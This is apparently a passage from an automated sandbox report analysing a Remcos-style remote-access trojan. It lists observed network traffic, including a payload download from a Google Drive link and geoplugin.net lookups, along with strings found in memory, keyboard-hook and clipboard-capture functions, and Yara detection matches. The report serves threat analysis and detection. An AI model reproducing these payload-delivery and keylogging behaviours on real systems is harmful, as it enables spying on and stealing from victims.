Source: global traffic HTTP traffic detected: GET /sorry/index?continue=https://www.google.com/async/newtab_promos&q=EgRmgZjcGNGNsLEGIjD9G5xmGH5ri1rv3DQ5wOXVjujAbZEINLE1ZHU1KvNcD8D04QZH5XmP2eIPYJfEfjEyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveSec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: 1P_JAR=2024-04-26-19; NID=513=e70pJcXp308g-zLvKr2jNfzlf1AWbQuxx93QyO1wlh747mGP0eLOjf7jkr_UXszPZPorC5RVMqJTvYbevYSerH_RLBZfC-j1bqwdBhdxbbGX0EyDoh3X-F2jSKf5iG07WXr7mZ4q9rkgKDP5hh0YZnm2e-fmfcH5KsRunNsMzjo
Source: global traffic HTTP traffic detected: GET /api/settings/en-GB/xml/settings-tipset?release=20h1&sku=Professional&platform=desktop HTTP/1.1Accept-Encoding: gzip, deflateHost: cxcs.microsoft.netConnection: Keep-Alive
Source: global traffic HTTP traffic detected: GET /fs/windows/config.json HTTP/1.1Connection: Keep-AliveAccept: */*Accept-Encoding: identityIf-Unmodified-Since: Tue, 16 May 2017 22:58:00 GMTRange: bytes=0-2147483646User-Agent: Microsoft BITS/7.8Host: fs.microsoft.com
Source: global traffic HTTP traffic detected: GET /SLS/%7B522D76A4-93E1-47F8-B8CE-07C937AD1A1E%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=download HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: drive.usercontent.google.com
Source: global traffic HTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=DTLaKFkphhrsh9g&MD=4mKMnfvA HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global traffic HTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
Source: global traffic DNS traffic detected: DNS query: www.google.com
Source: global traffic DNS traffic detected: DNS query: drive.google.com
Source: global traffic DNS traffic detected: DNS query: drive.usercontent.google.com
Source: global traffic DNS traffic detected: DNS query: www.pentegrasystem.com
Source: global traffic DNS traffic detected: DNS query: geoplugin.net
Source: global traffic HTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/htmlContent-Length: 26Date: Fri, 26 Apr 2024 19:56:05 GMTConnection: close
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: xkn.exe, 00000009.00000002.2186571233.0000015A4AE96000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.m
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAEVR36.crl0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAEVR36.crt0#
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: kn.exe String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en
Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enDisallowedCertLastSyncTimePinR
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/user
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2323628754.0000000000837000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, Kpeyvroh.PIF String found in binary or memory: http://geoplugin.net/json.gp
Source: sppsvc.pif, 0000001C.00000002.4524424593.000000001BA5B000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000026.00000002.2516862809.000000001B02B000.00000040.00001000.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp/C
Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gp2BF
Source: sppsvc.pif, 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpK0r
Source: sppsvc.pif, 0000001C.00000003.2323628754.0000000000837000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpa
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpoft
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://geoplugin.net/json.gpthority
Source: xkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://nuget.org/NuGet.exe
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.comodoca.com0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0A
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0C
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.digicert.com0X
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://ocsp.sectigo.com0C
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://www.microsoft.co
Source: Kpeyvroh.PIF, Kpeyvroh.PIF, 00000024.00000002.2421237324.00000000029A0000.00000040.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2465696824.000000007FBA0000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: http://www.pmail.com
Source: kn.exe String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%ws
Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr String found in binary or memory: https://%ws/%ws_%ws_%ws/service.svc/%wsADPolicyProviderSCEP
Source: xkn.exe, 00000009.00000002.2094439063.0000015A32DB1000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://aka.ms/pscore68
Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/
Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/Icon
Source: xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: sppsvc.pif, 0000001C.00000002.4519735851.000000001A71D000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?expo
Source: sppsvc.pif, 0000001C.00000002.4519735851.000000001A700000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://drive.google.com/uc?export=download&id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007D7000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4502894836.00000000007F8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/6
Source: sppsvc.pif, 0000001C.00000003.3094405950.00000000007BB000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094405950.0000000000796000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com/download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=download
Source: sppsvc.pif, 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://drive.usercontent.google.com:443/download?id=1SisUFlJTSsT_W48Ix2VwvCg8Ow1r24hB&export=downlo
Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/DeviceEnrollmentWebService.svc
Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/device/
Source: kn.exe String found in binary or memory: https://enterpriseregistration.windows.net/EnrollmentServer/key/
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/Pester/Pester
Source: kn.exe String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorize
Source: kn.exe, 00000019.00000002.2204550147.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 00000019.00000000.2199499528.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000000.2206763204.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe, 0000001B.00000002.2213638480.00007FF67DF4E000.00000002.00000001.01000000.0000000C.sdmp, kn.exe.23.dr String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/authorizeJoinStatusStorage::SetDefaultDiscoveryMetadatah
Source: kn.exe String found in binary or memory: https://login.microsoftonline.com/%s/oauth2/token
Source: SystemSettingsAdminFlows.exe, 00000013.00000002.4501063823.000001C6008E8000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.windows.local
Source: xkn.exe, 00000009.00000002.2180228886.0000015A42F66000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2180228886.0000015A42E2F000.00000004.00000800.00020000.00000000.sdmp, xkn.exe, 00000009.00000002.2094439063.0000015A3477C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://nuget.org/nuget.exe
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.org
Source: xkn.exe, 00000009.00000002.2094439063.0000015A34215000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://oneget.orgX
Source: sppsvc.pif, 0000001C.00000003.2289056435.000000007EB00000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000003.2290173157.000000007F1F0000.00000004.00001000.00020000.00000000.sdmp, sppsvc.pif, 0000001C.00000002.4519735851.000000001A63E000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2434146708.00000000206DF000.00000004.00001000.00020000.00000000.sdmp, Kpeyvroh.PIF, 00000024.00000002.2462639477.000000007EF30000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: https://sectigo.com/CPS0
Source: unknown Network traffic detected: HTTP traffic on port 49674 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49710 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49720
Source: unknown Network traffic detected: HTTP traffic on port 49729 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49720 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49714
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49713
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49734
Source: unknown Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49675 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49710
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49732
Source: unknown Network traffic detected: HTTP traffic on port 49734 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49673 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49732 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
Source: unknown Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49714 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown HTTPS traffic detected: 23.35.153.42:443 -> 192.168.2.5:49717 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49719 version: TLS 1.2
Source: unknown HTTPS traffic detected: 23.204.76.112:443 -> 192.168.2.5:49720 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49721 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.250.217.193:443 -> 192.168.2.5:49729 version: TLS 1.2
Source: unknown HTTPS traffic detected: 40.127.169.103:443 -> 192.168.2.5:49732 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FA2B8 SetWindowsHookExA 0000000D,1B9FA2A4,00000000 28_2_1B9FA2B8
Source: C:\Users\Public\Libraries\sppsvc.pif Windows user hook set: 0 keyboard low level C:\Users\Public\Libraries\sppsvc.pif
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FB70E OpenClipboard,GetClipboardData,CloseClipboard, 28_2_1B9FB70E
Source: C:\Users\Public\Libraries\Kpeyvroh.PIF Code function: 36_2_210768C1 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard, 36_2_210768C1
Source: C:\Users\Public\Libraries\sppsvc.pif Code function: 28_2_1B9FA3E0 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx, 28_2_1B9FA3E0
Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR

E-Banking Fraud

Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 36.2.Kpeyvroh.PIF.21060000.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000001C.00000002.4502894836.0000000000805000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2461262597.000000007E9A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4503348467.000000000081A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2419249499.000000000076D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3093456690.000000000080B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.2446139449.0000000021060000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4524281071.000000001B7CF000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.2504569132.000000000067A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.3094133776.0000000000801000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4503348467.0000000000810000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000002.4503348467.0000000000823000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: sppsvc.pif PID: 5228, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 7552, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: Kpeyvroh.PIF PID: 1528, type: MEMORYSTR
Source: Yara match File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
